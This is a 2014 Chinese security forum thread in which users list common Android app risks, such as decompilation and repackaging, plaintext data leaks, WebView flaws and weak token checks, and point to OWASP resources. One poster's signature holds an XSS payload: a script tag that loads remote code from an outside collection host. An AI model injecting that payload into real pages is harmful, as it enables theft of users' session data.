来讨论下,安卓APP常见的风险点有哪些?
cnrstar (Be My Personal Best!) | 2014-05-18 21:52
看很多厂商在球测试APP安全性,很多还是burp抓包,然后测接口的常见web漏洞去了,这个不在讨论范围内。那么除了web漏洞,安卓的APP还有哪些风险点呢?
先来两个不知道算不算的:
源代码可被反编译,可被修改后重新打包
楼下继续。。
各种吐槽:
1#
从容 (低调求发展.) | 2014-05-18 21:56
沙发- -. 逆向工程
2#
cnrstar (Be My Personal Best!) | 2014-05-18 22:01
@从容 逆向哪些东西?目的是什么呢?
拿到源代码?然后从哪方面审计呢?球大神科普。。
3#
从容 (低调求发展.) | 2014-05-18 22:06
@cnrstar 我也是菜鸟一枚- -. 建议你去看看相关的书籍,不同的APP运行系统有不同的逆向方法
4#
蟋蟀哥哥 (̷ͣ̑̆ͯ̆̋͋̒ͩ͊̋̇̒ͦ̿̐͞҉̷̻̖͎̦̼) | 2014-05-18 22:16
信息泄露, 比如腾讯的某APP就明文记录了主人的的GPS位置。。并且是每一秒的位置都有记录。
5#
open (心佛即佛,心魔即魔.) | 2014-05-18 22:25
第一,敏感信息,
第二,常见web漏洞,
第三,内部接口泄露,
第三,本地关键算法泄露,比如传输中的加密算法,客户端spma判断算法等等,这个是最主要的。
第四,常见的平台漏洞,比如webview使用不当导致的漏洞。
讨论APP的安全,主要是要有比较好的办法逆向,现在app,无论是ios还是安卓,要逆向都是比较困难的。
6#
lxj616 (简介) | 2014-05-18 22:29
webview rce
7#
cnrstar (Be My Personal Best!) | 2014-05-18 22:29
@open 碉堡了,学习!
8#
zeracker (多乌云、多机会!) | 2014-05-18 22:40
OWASP Mobile Top 10 Risks 写得挺不错的。https://www.owasp.org/index.php/OWASP_Mobile_Security_Project#Top_Ten_Mobile_Risks
我就不给你翻译了。
9#
肉肉 | 2014-05-18 22:45
不知道拒绝服务算不算
10#
px1624 (aaaaaaaaa) | 2014-05-18 22:51
不知道那种加密然后用文件浏览器可以查看的算不算
11#
he1renyagao ([code]<script src=http://xsserme.sinaapp.com/03h4FW?1383289085></script>[/code]) | 2014-05-18 22:53
android hacker's handbook
12#
itleaf ( 你死晕) | 2014-05-18 22:55
http://android.scap.org.cn/index.html
13#
易水寒 | 2014-05-18 23:01
卢彬良童鞋的议题 http://www.owasp.org.cn/OWASP_Events/download/copy7_of_.pdf
还有@碳基体 妹纸的 http://danqingdani.blog.163.com/blog/static/18609419520137143837489/
14#
Sogili (.) 长短短 (.) | 2014-05-18 23:02
app 授权 token 过期检验机制
15#
蓝莓说 | 2014-05-19 00:09
ios app 一样反编译 我就会 可以得到源码 反汇编
16#
Comer | 2014-05-19 06:07
masterkey
17#
Comer | 2014-05-19 06:08
貌似跑题了,擦
18#
cnrstar (Be My Personal Best!) | 2014-05-19 09:54
多谢各位,回头要整理一份完整的
19#
nclove | 2014-05-23 09:33
之前没事的时候测试通过了部分apk包和相关web应用请求数据方面的测试,比如测试了web天涯、人人等,通过测试发现天涯、126这些web登录信息都是以明文的方式在公网上进行传输的,所以既不安全,还有就是提到的apk包的签名打包等,微信好像就可以修改咱们登录的时候那个地球背景的图片,然后再签名,发现依然可以使用。其实手机安全挺重要的,比如现在好多的apk开发厂商就是流氓,在apk中加广告你就罢了,还加假的,不知道大家有没有同感。
留言评论(旧系统):